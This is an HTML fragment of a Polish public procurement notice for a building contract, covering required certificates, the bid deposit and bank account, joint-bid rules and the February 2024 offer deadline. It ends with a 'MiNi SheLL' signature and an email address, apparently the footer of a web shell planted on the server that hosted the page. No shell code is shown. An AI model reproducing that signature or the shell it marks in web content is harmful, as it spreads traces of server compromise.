należności;<br/>- zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega<br/>z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych - wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z<br/>robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny<br/>o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty - wykonał co najmniej jedną robotę budowlaną polegającą na budowie (w rozumieniu ustawy<br/>Prawo budowlane) budynku o powierzchni użytkowej co najmniej 200 m2 i wartości co najmniej<br/>1 200 000,00 zł brutto wraz z robotami towarzyszącymi polegającymi na zagospodarowaniu terenu<br/>przyległego do budynku. Przez zagospodarowanie terenu Zamawiający rozumie wykonanie łącznie co<br/>najmniej: ciągów komunikacyjnych (np. chodnik), miejsc postojowych i elementów małej architektury,<br/>(wzór wykazu stanowi załącznik Nr 5);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium.<br/>2. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 18 000,00 zł słownie:<br/>osiemnaście tysięcy zł 00/100<br/>3. Wadium musi być wniesione w formie zgodnej z art. 97 ust. 7 Ustawy.<br/>4. Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa ustawie Pzp.<br/>5. Potwierdzeniem skutecznego wniesienia wadium będzie:<br/>a) w przypadku wadium w formie pieniężnej - zaksięgowanie na rachunku bankowym Zamawiającego przed<br/>upływem terminu składania ofert. Zamawiający zaleca, aby Wykonawca dołączył do oferty dokument<br/>potwierdzający wniesienie wadium w formie pieniężnej,<br/>b) w przypadku wadium w formie innej niż pieniężna – przekazanie oryginału dokumentu wadialnego<br/>(gwarancji lub poręczenia), wystawionego zgodnie z obowiązującymi przepisami prawa, w formie postaci<br/>elektronicznej.<br/>6. W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji, gwarancja ma być co najmniej<br/>gwarancją bezwarunkową, nieodwołalną i płatną na pierwsze żądanie Zamawiającego dokonane w formie<br/>pisemnej lub oświadczenia woli złożonego w postaci elektronicznej opatrzonego kwalifikowanym podpisem<br/>elektronicznym, do której zastosowanie będzie miało prawo polskie.<br/>7. Gwarancje i poręczenia muszą zawierać (oprócz elementów właściwych dla każdej formy, określonych<br/>przepisami prawa):<br/>a) nazwę i adres Zamawiającego,<br/>b) oznaczenie (numer) oraz nazwa Postępowania,<br/>c) termin ważności wadium – odpowiadający terminowi związania ofertą.<br/>8. Zamawiający zaleca aby dokument wadialny (gwarancje lub poręczenia został złożony wraz z ofertą, jako<br/>załącznik do Formularza złożenia oferty).<br/>9. W przypadku oferty wspólnej, Zamawiający dopuszcza podział kwoty wadium pomiędzy Wykonawców<br/>wspólnie ubiegających się o udzielenie Zamówienia i jego wniesienie w częściach, o ile suma tych części<br/>będzie równa kwocie wadium określonej w ust. 1.<br/>10. Wadium wnoszone w pieniądzu należy przelać na następujący rachunek Zamawiającego: 45 1020 4115 0000<br/>9002 0004 2333 W tytule przelewu należy podać: „Wadium w Postępowaniu przetargowym:<br/>GR.271.18.2024” (oprocentowanie w/w rachunku wynosi 0,00%).<br/>11. Wykonawca jest zobowiązany podać w treści przelewu bankowego numer referencyjny postępowania.<br/>12. Zasady zwrotu oraz okoliczności zatrzymania wadium określa ustawa Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia<br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których<br/>mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi<br/>załącznik nr do 3.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/886168</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-26 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-26</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com